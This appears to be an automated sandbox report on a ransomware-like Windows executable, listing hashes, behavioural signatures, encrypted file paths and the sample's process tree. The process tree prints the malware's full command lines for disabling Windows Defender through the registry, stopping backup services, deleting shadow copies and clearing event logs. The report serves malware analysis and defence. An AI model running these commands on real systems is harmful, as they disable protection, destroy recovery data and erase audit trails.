Analysis
- max time kernel: 106s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 13-01-2022 10:00

- Static task: static1
- Behavioral task: behavioral1
  Sample: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
  Resource: win7-en-20211208
- Behavioral task: behavioral2
  Sample: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
  Resource: win10-en-20211208
General
- Target: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
- Size: 3.6MB
- MD5: 5bd555b0d8e12806fbdbbcc3971b1f67
- SHA1: 2da4a3e94754c2f94b5f440a68ac0a3b979d3242
- SHA256: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
- SHA512: cc3f5199621435a1d04546a7446557378933ab9f42b5b638b8fbdf4805661ac38312d68801dd017fd1665cfe2a5d26c198b2cfd1b0193389c4891bc0e982e13c
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: PID 1800 MpCmdRun.exe
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe, set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: PID 1552 bcdedit.exe; PID 872 bcdedit.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes:
  All 64 entries are "File opened for modification" by the sample process 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe:
  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-400.png
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\slide_in.wav
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OAAAADgAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OgAAADoAAAA0.4ywda
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-200.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-125.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MAAAADAAAAA0.4ywda
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_DAAAAAwAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-black_scale-100.png
  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\en-us\oregres.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookMedTile.scale-100.png
  C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\profilePic.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_LAAAACwAAAA0.4ywda
  C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\micaut.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_FgAAABYAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IgAAACIAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\LargeTile.scale-200.png
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png
  C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_EAAAABAAAAA0.4ywda
  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200_contrast-high.png
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar\msipc.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IAAAACAAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxSignature.p7x
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_40x40x32.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-200.png
  C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_BAAAAAQAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5671_20x20x32.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.scale-150.png
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-HK.respack
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2_32x32x32.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Java\jdk1.8.0_66\include\jni.h.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Square44x44Logo.targetsize-256_altform-unplated.png
  C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashScreen.scale-100_contrast-black.png
  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\8.rsrc
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-200.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_CgAAAAoAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_SaveAutomatically_LTR_Phone.mp4
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\LargeTile.scale-125.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda
  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MgAAADIAAAA0.4ywda
  C:\Program Files (x86)\Windows Media Player\ja-JP\wmplayer.exe.mui
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookLargeTile.scale-150.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda
  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-125.png
  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileLargeSquare.scale-100.png
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png
  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-48.png
  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml
  C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: PID 1668 vssadmin.exe
- Modifies registry class (3 IoCs)
  Processes (all reg.exe):
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: PID 3464 powershell.exe (3 events); PID 2252 powershell.exe (3 events); PID 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe (2 events)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (PID, process: tokens enabled):
  PID 1984 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 2228 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 488 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 1400 wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 1108 wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 1108 wmic.exe (second pass, list cut at 64 IoCs): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID wrote to memory of target PID; "sample" is 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe; each write is logged twice in the report and listed once here):
  PID 2060 (sample) wrote to memory of PID 1064 (net.exe)
  PID 1064 (net.exe) wrote to memory of PID 1192 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 512 (net.exe)
  PID 512 (net.exe) wrote to memory of PID 3580 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 924 (net.exe)
  PID 924 (net.exe) wrote to memory of PID 1480 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 2080 (net.exe)
  PID 2080 (net.exe) wrote to memory of PID 4044 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 4020 (net.exe)
  PID 4020 (net.exe) wrote to memory of PID 3416 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 3216 (net.exe)
  PID 3216 (net.exe) wrote to memory of PID 2448 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 2836 (net.exe)
  PID 2836 (net.exe) wrote to memory of PID 2380 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 1060 (net.exe)
  PID 1060 (net.exe) wrote to memory of PID 3244 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 2176 (net.exe)
  PID 2176 (net.exe) wrote to memory of PID 3156 (net1.exe)
  PID 2060 (sample) wrote to memory of PID 4092 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 736 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 592 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 1100 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 944 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 2572 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 1240 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 2320 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 1712 (sc.exe)
  PID 2060 (sample) wrote to memory of PID 1920 (reg.exe)
  PID 2060 (sample) wrote to memory of PID 988 (reg.exe)
  PID 2060 (sample) wrote to memory of PID 2392 (reg.exe)
  PID 2060 (sample) wrote to memory of PID 4056 (reg.exe)
  PID 2060 (sample) wrote to memory of PID 3192 (reg.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe (PID 2060)
  Command line: "C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\net.exe (PID 1064)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1192)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\SYSTEM32\net.exe (PID 512)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\net.exe (PID 924)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1480)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\SYSTEM32\net.exe (PID 2080)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4044)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\SYSTEM32\net.exe (PID 4020)
    Command line: net.exe stop "vmicvss" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3416)
      Command line: C:\Windows\system32\net1 stop "vmicvss" /y
  - C:\Windows\SYSTEM32\net.exe (PID 3216)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2448)
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\SYSTEM32\net.exe (PID 2836)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2380)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\SYSTEM32\net.exe (PID 1060)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3244)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\SYSTEM32\net.exe (PID 2176)
    Command line: net.exe stop "UnistoreSvc_12a5d" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3156)
      Command line: C:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y
  - C:\Windows\SYSTEM32\sc.exe (PID 4092)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 736)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 592)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1100)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 944)
    Command line: sc.exe config "vmicvss" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2572)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1240)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 2320)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\SYSTEM32\sc.exe (PID 1712)
    Command line: sc.exe config "UnistoreSvc_12a5d" start= disabled
  - C:\Windows\SYSTEM32\reg.exe (PID 1920)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 988)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2392)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 4056)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3192)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2260)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 320)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 2952)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3080)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 3880)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1344)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1448)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 1188)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 820)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 68)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\reg.exe (PID 504)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SYSTEM32\schtasks.exe (PID 4080)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 3764)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 2536)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 2816)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\SYSTEM32\schtasks.exe (PID 2560)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:404
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3852
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1200
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3776 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3632 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2440 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2340
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1648
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1932
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3180
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2876 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3796
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1668 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:488 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400 -
